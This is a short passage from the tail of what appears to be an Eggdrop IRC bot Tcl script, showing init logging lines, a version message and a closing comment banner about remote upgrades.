 puth $i $banner ; return 1
}
putlog "[sv] \[init\] - 0x15 - help system"
init:final ; putlog "[sv] \[init\] - I am running [sv] version [rv]"
#######################EOT#######################
## this tcl has not been remotely upgraded yet ##
#######################EOT#######################
